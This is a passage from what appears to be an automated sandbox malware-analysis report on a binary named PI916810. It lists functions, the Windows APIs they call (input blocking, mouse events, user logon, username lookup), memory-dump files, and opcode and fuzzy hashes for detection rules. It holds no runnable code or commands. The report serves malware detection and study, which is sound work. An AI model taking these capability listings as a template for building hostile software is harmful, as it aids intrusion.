                                                                                                                                                                            • Instruction Fuzzy Hash: ABE0EC76010650EFE7252B61EC09D777BEDEF04354B24883EF89684871DB66AC91DB14
                                                                                                                                                                            Function 0048A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00488F97,?,?,?,00000001), ref: 0048A39A
                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0048A3A3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                            • Opcode ID: 55e908badd7c02d3a5cebcd6a439fc959496d811faf5d06d8bfdc0bb005b536f
                                                                                                                                                                            • Instruction ID: 69cc497cc70884dbe63835d5b42619d2e2460279b98d61232b1b907326d7a2e8
                                                                                                                                                                            • Opcode Fuzzy Hash: 55e908badd7c02d3a5cebcd6a439fc959496d811faf5d06d8bfdc0bb005b536f
                                                                                                                                                                            • Instruction Fuzzy Hash: B1B09231054248ABCA002B91EC49B883F68EB44AA2F404030FA0D88C66CB6255548A99
                                                                                                                                                                            Function 0048F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f1eb75bb591dd2d49fd8217e8e28569b6aaa6dd41d0658f4d02341d47575b3d2
                                                                                                                                                                            • Instruction ID: 787e6e99ff111a249dd06d9bc58ecc5e2543187282fe1cef2b0ae72fbf2937a7
                                                                                                                                                                            • Opcode Fuzzy Hash: f1eb75bb591dd2d49fd8217e8e28569b6aaa6dd41d0658f4d02341d47575b3d2
                                                                                                                                                                            • Instruction Fuzzy Hash: 2B321821D69F014DD7236634D83233A6248AFB73D4F15DB37E819B5AA6EB2CD5D38204
                                                                                                                                                                            Function 0049267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6cff946c68b4f1e1d74f0e83646eb5456c1abf10e1b54f6817e394437bcd7696
                                                                                                                                                                            • Instruction ID: 2040d988682156b7eb135330d389b42a02e290aeb10583c1ca639af84c055a3e
                                                                                                                                                                            • Opcode Fuzzy Hash: 6cff946c68b4f1e1d74f0e83646eb5456c1abf10e1b54f6817e394437bcd7696
                                                                                                                                                                            • Instruction Fuzzy Hash: 51B11260D2AF414DD72396398931336BB4CAFBB2C5F51D72BFC2A74D22EB2185A38145
                                                                                                                                                                            Function 004D41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • BlockInput.USER32(00000001), ref: 004D4218
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BlockInput
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3456056419-0
                                                                                                                                                                            • Opcode ID: 7c160fba2a7d9687fd078bfe9440e01046fb1cf9ba6c06a2e208866adbf0a6b9
                                                                                                                                                                            • Instruction ID: db6dd690315b10d08436da90e8db4a79a31a50adb524fe84a295ad2a47c8132a
                                                                                                                                                                            • Opcode Fuzzy Hash: 7c160fba2a7d9687fd078bfe9440e01046fb1cf9ba6c06a2e208866adbf0a6b9
                                                                                                                                                                            • Instruction Fuzzy Hash: 6EE048312401145FC710EF9AD454A5BF7DCAF947A0F04806BFC49C7352DAB4EC418B95
                                                                                                                                                                            Function 004C4EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 004C4EEC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: mouse_event
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2434400541-0
                                                                                                                                                                            • Opcode ID: 15bb94e29a1d1ecc3d43831a9e485279da9c637b5630d76c7820dcd39c47aaba
                                                                                                                                                                            • Instruction ID: e1b427406b8dedd29ec4fe233c97f30e975ae1ce3b5761040cb141aee1d021ac
                                                                                                                                                                            • Opcode Fuzzy Hash: 15bb94e29a1d1ecc3d43831a9e485279da9c637b5630d76c7820dcd39c47aaba
                                                                                                                                                                            • Instruction Fuzzy Hash: 84D05E9C16060439EED84B209E7FF770108F380785FD2414FB102891C2D8D86D556039
                                                                                                                                                                            Function 004B8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,004B88D1), ref: 004B8CB3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LogonUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1244722697-0
                                                                                                                                                                            • Opcode ID: 4a2aa67270783bf0cdcfd8f232ad9100fdb8dc5446c65927db5c16150a016ea4
                                                                                                                                                                            • Instruction ID: 04ac73d16242db4295f5a685f4790f845751ef5e976a60517e70538d5209b3e0
                                                                                                                                                                            • Opcode Fuzzy Hash: 4a2aa67270783bf0cdcfd8f232ad9100fdb8dc5446c65927db5c16150a016ea4
                                                                                                                                                                            • Instruction Fuzzy Hash: 6FD05E3226050EABEF018EA4DC01EAE3B69EB04B01F408121FE15C50A1C775E835AB60
                                                                                                                                                                            Function 004A2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 004A2242
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                                                            • Opcode ID: 7d6f1352ccd0c5657b8fd671f77381d29125712e48eb868f526df57003f91290
                                                                                                                                                                            • Instruction ID: e1c6701392707c9473ead6d1c7c5d2523a0a594582136c9607d8dc6fe1e0cd36
                                                                                                                                                                            • Opcode Fuzzy Hash: 7d6f1352ccd0c5657b8fd671f77381d29125712e48eb868f526df57003f91290
                                                                                                                                                                            • Instruction Fuzzy Hash: 9EC04CF1800109DBDB05DB90D988DEE77BCAB04304F104066A101F2151D7749B448A75
                                                                                                                                                                            Function 0048A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0048A36A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                            • Opcode ID: 1eb099bbeba89eb9d8c4df0d287f060314658f1b5814069e821bf15df0e2af54
                                                                                                                                                                            • Instruction ID: dc03f6331b18798c6b05bae5acd95e91403a7fcda5b6994133efc92b8b49dc20
                                                                                                                                                                            • Opcode Fuzzy Hash: 1eb099bbeba89eb9d8c4df0d287f060314658f1b5814069e821bf15df0e2af54
                                                                                                                                                                            • Instruction Fuzzy Hash: 90A0113000020CAB8A002B82EC08888BFACEB002A0B008030F80C888228B32A8208A88
                                                                                                                                                                            Function 00478A0E Relevance: .6, Instructions: 608COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 65ce551cac968bcbc279b2198b92eba90bc0a0f9aac8e7b33f21f61121024a4d
                                                                                                                                                                            • Instruction ID: 238a460e79baf4e51010f15f3d5e4632d230f303bb13717ef8c09dcf66d96329
                                                                                                                                                                            • Opcode Fuzzy Hash: 65ce551cac968bcbc279b2198b92eba90bc0a0f9aac8e7b33f21f61121024a4d
                                                                                                                                                                            • Instruction Fuzzy Hash: 18221730A416158FDF298B18C5987FEB7A1EB11304F24C46FD84A8B391DB3C9D86DB69
                                                                                                                                                                            Function 00482405 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                                                            • Instruction ID: 0c82d46051802c1aa00dc5b114b8befd02969718b0665f034f2920335bbc1bef
                                                                                                                                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                                                            • Instruction Fuzzy Hash: 54C1D4322050A30ADF2D563A853403FBAE05AA27B131A0F5FE4B3DB6D4EF68D525D724
                                                                                                                                                                            Function 0048283A Relevance: .3, Instructions: 341COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                                                            • Instruction ID: a8a41c619bbe085478df5cd05a1bfbacbfe957acfe618da4738d37edb623ebe0
                                                                                                                                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                                                            • Instruction Fuzzy Hash: 8DC1A3322050A309DF2D5639853403FBBE15AA27B131A0F6FE4B2DB6D4EF28D525E724
                                                                                                                                                                            Function 010FECA0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                            • Instruction ID: 43c8cc89fdc0253f3b28ea67a98b1c905bedd032f48b403968a8736ba4911805
                                                                                                                                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                            • Instruction Fuzzy Hash: 1B41D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                                                                                                                            Function 010FEB90 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                            • Instruction ID: c38d14e8c1275b00d8f03a756c79db552599a15c4c5d608ea3cd47d25db072f0
                                                                                                                                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 74019278E00109EFCB44DF98C5919AEF7F6FB48310F208599E949A7751D730AE51DB90
                                                                                                                                                                            Function 010FEB30 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                            • Instruction ID: f0cd867ef0f77991f68e5f0e401f1b17c442cff1c97371059a03477f533895ba
                                                                                                                                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C019278A00209EFCB44DF98C5919AEF7F5FF48310F208599D949A7715D730AE42DB90
                                                                                                                                                                            Function 010FD540 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                                                                            Function 004E37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharUpperBuffW.USER32(?,?,004EF910), ref: 004E38AF
                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 004E38D3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharUpperVisibleWindow
                                                                                                                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                            • API String ID: 4105515805-45149045
                                                                                                                                                                            • Opcode ID: 6fe4b412683738d0d39bce10d171a6b220ee1f7284bd7aa6bcabacc214afa373
                                                                                                                                                                            • Instruction ID: f0b6de09a525017e89dd5a29dfff5dc7aa04fb1fbcada694bb044f66bb34f622
                                                                                                                                                                            • Opcode Fuzzy Hash: 6fe4b412683738d0d39bce10d171a6b220ee1f7284bd7aa6bcabacc214afa373
                                                                                                                                                                            • Instruction Fuzzy Hash: A8D1CA302042458BDB15EF12C455AAE77D6AF94349F10485EB8825B3A3DB38FE4BCB4A
                                                                                                                                                                            Function 004EA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004EA89F
                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004EA8D0
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 004EA8DC
                                                                                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 004EA8F6
                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 004EA905
                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004EA930
                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 004EA938
                                                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 004EA93F
                                                                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 004EA94E
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004EA955
                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 004EA9A0
                                                                                                                                                                            • FillRect.USER32(?,?,?), ref: 004EA9D2
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004EA9FD
                                                                                                                                                                              • Part of subcall function 004EAB60: GetSysColor.USER32(00000012), ref: 004EAB99
                                                                                                                                                                              • Part of subcall function 004EAB60: SetTextColor.GDI32(?,?), ref: 004EAB9D
                                                                                                                                                                              • Part of subcall function 004EAB60: GetSysColorBrush.USER32(0000000F), ref: 004EABB3
                                                                                                                                                                              • Part of subcall function 004EAB60: GetSysColor.USER32(0000000F), ref: 004EABBE
                                                                                                                                                                              • Part of subcall function 004EAB60: GetSysColor.USER32(00000011), ref: 004EABDB
                                                                                                                                                                              • Part of subcall function 004EAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004EABE9
                                                                                                                                                                              • Part of subcall function 004EAB60: SelectObject.GDI32(?,00000000), ref: 004EABFA
                                                                                                                                                                              • Part of subcall function 004EAB60: SetBkColor.GDI32(?,00000000), ref: 004EAC03
                                                                                                                                                                              • Part of subcall function 004EAB60: SelectObject.GDI32(?,?), ref: 004EAC10
                                                                                                                                                                              • Part of subcall function 004EAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 004EAC2F
                                                                                                                                                                              • Part of subcall function 004EAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004EAC46
                                                                                                                                                                              • Part of subcall function 004EAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 004EAC5B
